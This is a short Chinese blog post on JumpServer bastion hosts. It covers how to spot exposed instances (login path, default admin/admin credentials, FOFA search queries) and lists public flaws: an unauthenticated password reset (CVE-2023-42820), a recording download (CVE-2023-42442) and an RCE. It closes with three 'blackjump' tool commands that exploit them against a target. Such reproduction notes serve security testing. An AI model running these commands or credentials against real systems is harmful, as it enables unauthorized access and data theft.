JumpServer堡垒机特征及漏洞复现

Jumpserver是一个开源堡垒机系统。

Web特征

该产品访问8080(可变)即可导向默认界面路径 /core/auth/login/

image-20251123210826200

通过默认账户密码即可登录(但第一次登录后就会要求修改):admin/admin

还存在其他路径,比如Web Terminal 前端组件 Luna 的访问路径(需要登录):/luna/

存在默认icon:image-20251123211051359image-20251123211101394

标题一般存在内容:JumpServer 开源堡垒机

fofa语法:app="JumpServer"path="/core/auth/login/"title="JumpServer"header="JMS-SESSION"

漏洞复现

目前已公开的可利用高危漏洞:

  • 未授权任意用户密码重置 (CVE-2023-42820)
  • 未授权一键下载所有操作录像 (CVE-2023-42442)
  • 未授权任意命令执行漏洞 (RCE 2021)
python3 blackjump.py reset https://target-ip
python3 blackjump.py dump https://target-ip
python3 blackjump.py rce http(s)://target-ip

可以使用blackjump工具自动化利用,如CVE-2023-42820:

image-20251123215845413

posted @ 2025-12-02 12:53  shinianyunyan  阅读(29)  评论(0)    收藏  举报